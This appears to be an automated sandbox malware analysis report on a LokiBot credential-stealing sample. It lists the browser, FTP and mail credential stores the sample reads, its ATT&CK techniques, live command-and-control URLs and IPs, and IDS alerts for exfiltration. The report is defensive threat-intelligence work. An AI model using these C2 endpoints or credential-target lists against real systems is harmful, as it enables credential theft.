                  Source: Yara matchFile source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Hh8hqqbu9X.exe PID: 7064, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3292, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000001.00000002.3381859873.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: PopPassword1_2_0040D069
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: SmtpPassword1_2_0040D069
                  Source: Yara matchFile source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  1
                  Account Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Shared Modules
                  Boot or Logon Initialization Scripts1
                  Access Token Manipulation
                  11
                  Deobfuscate/Decode Files or Information
                  2
                  Credentials in Registry
                  1
                  File and Directory Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)411
                  Process Injection
                  2
                  Obfuscated Files or Information
                  Security Account Manager13
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Software Packing
                  NTDS111
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture112
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets1
                  Process Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials31
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion
                  DCSync1
                  System Owner/User Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Hh8hqqbu9X.exe82%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  Hh8hqqbu9X.exe79%VirustotalBrowse
                  Hh8hqqbu9X.exe100%AviraTR/AD.LokiBot.sbeoo
                  Hh8hqqbu9X.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  publicspeaking.co.id
                  92.113.16.63
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    http://publicspeaking.co.id/okoye/Panel/five/fre.phptrue
                      unknown
                      http://kbfvzoboss.bid/alien/fre.phpfalse
                        high
                        http://alphastand.win/alien/fre.phpfalse
                          high
                          http://alphastand.trade/alien/fre.phpfalse
                            high
                            http://alphastand.top/alien/fre.phpfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://publicspeaking.co.id/okoye/Panel/five/fre.phpvbc.exe, 00000001.00000002.3381859873.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000001.00000002.3381859873.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpfalse
                                unknown
                                http://www.ibsensoftware.com/vbc.exe, vbc.exe, 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  92.113.16.63
                                  publicspeaking.co.idUkraine
                                  6849UKRTELNETUAtrue
                                  92.113.16.67
                                  unknownUkraine
                                  6849UKRTELNETUAtrue
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1579462
                                  Start date and time:2024-12-22 14:11:05 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 10s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:5
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Hh8hqqbu9X.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:f4c0448c427e926b0d3c0d1fbc1a866e.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@3/3@5/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 92
                                  • Number of non-executed functions: 6
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  TimeTypeDescription
                                  08:12:13API Interceptor60x Sleep call for process: vbc.exe modified
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  publicspeaking.co.idwi7zJOZT2r.exeGet hashmaliciousLokibotBrowse
                                  • 216.239.38.21
                                  FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeGet hashmaliciousLokibotBrowse
                                  • 216.239.36.21
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  UKRTELNETUAx86.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 92.113.237.42
                                  nsharm5.elfGet hashmaliciousMiraiBrowse
                                  • 37.53.5.183
                                  HmP9fn8NM9.exeGet hashmaliciousUnknownBrowse
                                  • 92.113.16.201
                                  arm5.nn-20241218-1651.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 94.178.159.232
                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 94.178.39.247
                                  jew.arm.elfGet hashmaliciousUnknownBrowse
                                  • 92.112.21.155
                                  https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                  • 213.186.120.178
                                  arm5.elfGet hashmaliciousMiraiBrowse
                                  • 92.113.237.55
                                  bot.m68k.elfGet hashmaliciousMiraiBrowse
                                  • 94.178.33.185
                                  bot.sh4.elfGet hashmaliciousMiraiBrowse
                                  • 94.178.146.21
                                  UKRTELNETUAx86.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 92.113.237.42
                                  nsharm5.elfGet hashmaliciousMiraiBrowse
                                  • 37.53.5.183
                                  HmP9fn8NM9.exeGet hashmaliciousUnknownBrowse
                                  • 92.113.16.201
                                  arm5.nn-20241218-1651.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 94.178.159.232
                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 94.178.39.247
                                  jew.arm.elfGet hashmaliciousUnknownBrowse
                                  • 92.112.21.155
                                  https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                  • 213.186.120.178
                                  arm5.elfGet hashmaliciousMiraiBrowse
                                  • 92.113.237.55
                                  bot.m68k.elfGet hashmaliciousMiraiBrowse
                                  • 94.178.33.185
                                  bot.sh4.elfGet hashmaliciousMiraiBrowse
                                  • 94.178.146.21
                                  No context
                                  No context
                                  Process:C:\Users\user\Desktop\Hh8hqqbu9X.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.34331486778365
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                  Malicious:true
                                  Reputation:high, very likely benign file
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:1
                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):47
                                  Entropy (8bit):1.168829563685559
                                  Encrypted:false
                                  SSDEEP:3:/lSll2DQi:AoMi
                                  MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                  SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                  SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                  SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:........................................user.
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):5.013018117930209
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  File name:Hh8hqqbu9X.exe
                                  File size:577'536 bytes
                                  MD5:f4c0448c427e926b0d3c0d1fbc1a866e
                                  SHA1:273aa64fd2523237acde7d342a09a259a3c5499a
                                  SHA256:cee3904c1eb0245328cbbe8770f69417d56218ba9ed6ded95d60183264557fef
                                  SHA512:605665259a268ccf31d01c6332693d259f37efa72e517dc6bc09c5fc66b53b274bfd9f111607499f9aad64c87aa70b8c9c21fe69a6c532b193e2704f1ce9fd1c
                                  SSDEEP:12288:qVAsGfYtKR7zmF4WdwGexfoAu9kcNuuh5:qVAsGfYtKR7yFjdwGexf5u9kcNuuh5
                                  TLSH:6FC400C6DE4909E7D805A2FC18719446FF8EED3EA17C4941F25BB85C80B8EED5898BC1
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.[.................H...........f... ........@.. .......................@............@................................
                                  Icon Hash:0f3152707071330f
                                  Entrypoint:0x46669e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5BF13C88 [Sun Nov 18 10:18:48 2018 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x666500x4b.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x6a0000x27e60.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x665f80x1c.text
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x646a40x64800f02e9ea7fdf7838916b31e4c42c6b4d1False0.3737683652052239data4.070627356787008IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .sdata0x680000x1e80x200ba1a51c546597b8fdcb7d0154e4ab651False0.857421875data6.638446248926509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x6a0000x27e600x280001802a9f454a5d4c9976184044129fda0False0.14769287109375data5.240359504242061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x920000xc0x20057bc7cabfdf0b8c9037a61a230d48313False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0x6a2800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.09331006743168106
                                  RT_ICON0x7aaa80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.1538259407189405
                                  RT_ICON0x83f500x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.18904805914972272
                                  RT_ICON0x893d80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.1531058101086443
                                  RT_ICON0x8d6000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.23817427385892115
                                  RT_ICON0x8fba80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2732176360225141
                                  RT_ICON0x90c500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4057377049180328
                                  RT_ICON0x915d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4920212765957447
                                  RT_GROUP_ICON0x91a400x76dataEnglishUnited States0.7457627118644068
                                  RT_VERSION0x91ab80x1bcdataEnglishUnited States0.5247747747747747
                                  RT_MANIFEST0x91c740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                  DLLImport
                                  mscoree.dll_CorExeMain
                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States
                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-12-22T14:12:08.679463+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970492.113.16.6380TCP
                                  2024-12-22T14:12:08.679463+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970492.113.16.6380TCP
                                  2024-12-22T14:12:08.679463+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970492.113.16.6380TCP
                                  2024-12-22T14:12:10.261798+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.54970492.113.16.6380TCP
                                  2024-12-22T14:12:10.630928+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970592.113.16.6380TCP
                                  2024-12-22T14:12:10.630928+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970592.113.16.6380TCP
                                  2024-12-22T14:12:10.630928+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970592.113.16.6380TCP
                                  2024-12-22T14:12:12.114201+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.54970592.113.16.6380TCP
                                  2024-12-22T14:12:12.555175+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970692.113.16.6380TCP
                                  2024-12-22T14:12:12.555175+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970692.113.16.6380TCP
                                  2024-12-22T14:12:12.555175+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970692.113.16.6380TCP
                                  2024-12-22T14:12:14.102015+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54970692.113.16.6380TCP
                                  2024-12-22T14:12:14.102015+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54970692.113.16.6380TCP
                                  2024-12-22T14:12:14.486390+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970792.113.16.6380TCP
                                  2024-12-22T14:12:14.486390+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970792.113.16.6380TCP
                                  2024-12-22T14:12:14.486390+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970792.113.16.6380TCP
                                  2024-12-22T14:12:16.123769+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54970792.113.16.6380TCP
                                  2024-12-22T14:12:16.123769+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54970792.113.16.6380TCP
                                  2024-12-22T14:12:16.506905+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970992.113.16.6380TCP
                                  2024-12-22T14:12:16.506905+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970992.113.16.6380TCP
                                  2024-12-22T14:12:16.506905+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970992.113.16.6380TCP
                                  2024-12-22T14:12:18.090018+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54970992.113.16.6380TCP
                                  2024-12-22T14:12:18.090018+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54970992.113.16.6380TCP
                                  2024-12-22T14:12:18.490175+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971592.113.16.6380TCP
                                  2024-12-22T14:12:18.490175+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971592.113.16.6380TCP
                                  2024-12-22T14:12:18.490175+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971592.113.16.6380TCP
                                  2024-12-22T14:12:20.071784+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971592.113.16.6380TCP
                                  2024-12-22T14:12:20.071784+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971592.113.16.6380TCP
                                  2024-12-22T14:12:20.454277+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971692.113.16.6380TCP
                                  2024-12-22T14:12:20.454277+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971692.113.16.6380TCP
                                  2024-12-22T14:12:20.454277+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971692.113.16.6380TCP
                                  2024-12-22T14:12:22.015203+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971692.113.16.6380TCP
                                  2024-12-22T14:12:22.015203+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54971692.113.16.6380TCP
                                  2024-12-22T14:12:22.413385+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972392.113.16.6380TCP
                                  2024-12-22T14:12:22.413385+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972392.113.16.6380TCP
